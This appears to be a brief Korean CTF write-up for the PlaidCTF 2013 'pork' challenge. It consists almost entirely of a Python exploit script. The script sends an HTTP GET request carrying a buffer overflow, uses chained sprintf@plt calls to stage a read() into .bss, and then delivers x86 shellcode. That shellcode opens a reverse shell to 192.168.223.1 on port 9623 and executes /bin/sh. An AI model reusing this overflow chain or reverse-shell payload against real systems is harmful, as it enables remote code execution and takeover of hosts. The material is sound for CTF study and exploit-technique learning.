PlaidCTF-2013 pork

bss로 점핑과 sprintf "\x0d"때문에 약간 삽질했네요;;

from socket import *
from time import sleep
from struct import pack,unpack
p = lambda x: pack("<L",x)
up = lambda x: unpack("<L",x)[0]
shell = ("\x6a\x66\x58\x99\x31\xdb\x43\x52\x53\x6a\x02\x89"
         "\xe1\xcd\x80\x96\x6a\x66\x58\x43\x68\xc0\xa8\xdf"
         "\x01\x66\x68\x25\x97\x66\x53\x89\xe1\x6a\x10\x51"
         "\x56\x89\xe1\x43\xcd\x80\x87\xf3\x6a\x03\x59\xb0"
         "\x3f\xcd\x80\x49\x79\xf9\x52\x68\x2f\x2f\x73\x68"
         "\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80")
#read plt/bss+32/read(4,bss+32,75 = len(shell))
makeread = [0x8049a58,0x80482f0,0x804aba0,0x804abb7,
            0x80486be,0x804ac58,0x804ac58,0x804ac58,
            0x8049a58,0x80482f0,0x804aba0,0x804abb7,
            0x804907d,0x804ac58,0x804ac58,0x804ac58]
def main():
    S=socket(AF_INET,SOCK_STREAM)
    S.connect(('192.168.223.129',33227))
 
    sprintf_plt = 0x804887C
    bss = 0x804aed4
    ppppr = 0x80499a5
    payload = "A"*1024
    payload += p(sprintf_plt)
    payload += p(ppppr+2)
    payload += p(bss)
    payload += p(0x804ac98)
    bss+=4
    for i in makeread:
        payload += p(sprintf_plt)
        payload += p(ppppr+2)
        payload += p(bss)
        payload += p(i)
        bss+=1
    payload += p(ppppr+3)
    payload += p(0x804aed0)
    payload += p(0x8049565)
    S.send("GET http://"+payload+"/ HTTP/1.1\r\n")
    sleep(1)
    S.send("\r\n")
    S.send(shell)
 
if __name__ == "__main__":
    main()